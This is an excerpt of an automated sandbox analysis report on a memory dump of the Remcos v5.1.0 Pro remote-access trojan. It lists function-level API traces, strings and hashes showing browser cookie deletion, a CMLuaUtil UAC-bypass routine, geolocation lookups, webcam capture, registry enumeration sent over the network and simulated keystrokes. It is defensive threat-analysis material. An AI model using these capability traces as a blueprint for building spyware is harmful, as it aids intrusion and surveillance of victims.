                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InputSend
                  • String ID:
                  • API String ID: 3431551938-0
                  • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                  • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                  • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                  • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                  Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __freea$__alloca_probe_16_free
                  • String ID: a/p$am/pm$zD
                  • API String ID: 2936374016-2723203690
                  • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                  • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                  • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                  • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                  Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Enum$InfoQueryValue
                  • String ID: [regsplt]$xUG$TG
                  • API String ID: 3554306468-1165877943
                  • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                  • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                  • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                  • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                  Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID: D[E$D[E
                  • API String ID: 269201875-3695742444
                  • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                  • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                  • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                  • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                  Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                    • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                    • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumInfoOpenQuerysend
                  • String ID: xUG$NG$NG$TG
                  • API String ID: 3114080316-2811732169
                  • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                  • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                  • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                  • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                  Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                  • __alloca_probe_16.LIBCMT ref: 004511B1
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                  • __freea.LIBCMT ref: 0045121D
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                  • String ID: PkGNG
                  • API String ID: 313313983-263838557
                  • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                  • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                  • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                  • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                  Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                    • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                    • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                  • _wcslen.LIBCMT ref: 0041B763
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                  • API String ID: 37874593-122982132
                  • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                  • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                  • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                  • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                  Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32 ref: 004135E7
                    • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                  • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                  • API String ID: 1133728706-4073444585
                  • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                  • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                  • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                  • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                  Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                  • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                  • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                  • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                  Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                  Download Yara Rule
                  APIs
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                  • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                  • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                  Strings
                  • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleOpen$FileRead
                  • String ID: http://geoplugin.net/json.gp
                  • API String ID: 3121278467-91888290
                  • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                  • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                  • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                  • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                  Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                  • _free.LIBCMT ref: 00450F48
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00450F53
                  • _free.LIBCMT ref: 00450F5E
                  • _free.LIBCMT ref: 00450FB2
                  • _free.LIBCMT ref: 00450FBD
                  • _free.LIBCMT ref: 00450FC8
                  • _free.LIBCMT ref: 00450FD3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                  • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                  • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                  Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                  • int.LIBCPMT ref: 00411183
                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                  • std::_Facet_Register.LIBCPMT ref: 004111C3
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                  • String ID: (mG
                  • API String ID: 2536120697-4059303827
                  • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                  • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                  • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                  • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                  Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32 ref: 004135E7
                    • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                  • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCurrentOpenProcessQueryValue
                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  • API String ID: 1866151309-2070987746
                  • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                  • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                  • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                  • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                  Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                  • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                  • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                  • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                  • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                  Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                    • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                    • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                  • CoUninitialize.OLE32 ref: 00407629
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeObjectUninitialize_wcslen
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                  • API String ID: 3851391207-3324213274
                  • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                  • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                  • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                  • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                  Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                  • GetLastError.KERNEL32 ref: 0040BAE7
                  Strings
                  • [Chrome Cookies not found], xrefs: 0040BB01
                  • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                  • UserProfile, xrefs: 0040BAAD
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  • API String ID: 2018770650-304995407
                  • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                  • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                  • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                  • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                  Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                  Download Yara Rule
                  APIs
                  • AllocConsole.KERNEL32 ref: 0041CDA4
                  • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Console$AllocOutputShowWindow
                  • String ID: Remcos v$5.1.0 Pro$CONOUT$
                  • API String ID: 2425139147-1043272453
                  • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                  • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                  • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                  • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                  Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044336D
                  • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$PkGNG$mscoree.dll
                  • API String ID: 4061214504-213444651
                  • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                  • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                  • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                  • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                  Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                  Download Yara Rule
                  APIs
                  • __allrem.LIBCMT ref: 0043AC69
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                  • __allrem.LIBCMT ref: 0043AC9C
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                  • __allrem.LIBCMT ref: 0043ACD1
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                  • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                  • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                  • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: H_prologSleep
                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                  • API String ID: 3469354165-3054508432
                  • Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                  • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                  • Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                  • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                  Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __cftoe
                  • String ID:
                  • API String ID: 4189289331-0
                  • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                  • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                  • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                  • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                  Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
